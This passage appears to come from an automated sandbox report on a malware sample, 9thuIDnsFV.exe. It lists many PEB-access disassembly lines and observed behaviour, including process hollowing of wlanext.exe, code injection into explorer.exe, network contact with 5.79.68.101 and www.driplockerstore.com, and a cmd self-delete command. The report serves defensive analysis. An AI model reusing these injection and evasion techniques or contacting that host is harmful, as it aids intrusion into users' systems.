          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 5.79.68.101 80
          Source: C:\Windows\explorer.exeDomain query: www.driplockerstore.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeMemory written: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 2B0000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeMemory written: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe base: 400000
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeMemory written: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe base: 401000
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeMemory written: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe base: 1189008
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe'
          Source: explorer.exe, 0000000E.00000000.467119162.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000014.00000002.599758383.0000000004210000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000E.00000000.467119162.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000014.00000002.599758383.0000000004210000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000E.00000000.467119162.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000014.00000002.599758383.0000000004210000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 0000000E.00000000.467119162.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000014.00000002.599758383.0000000004210000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Users\user\Desktop\9thuIDnsFV.exe VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
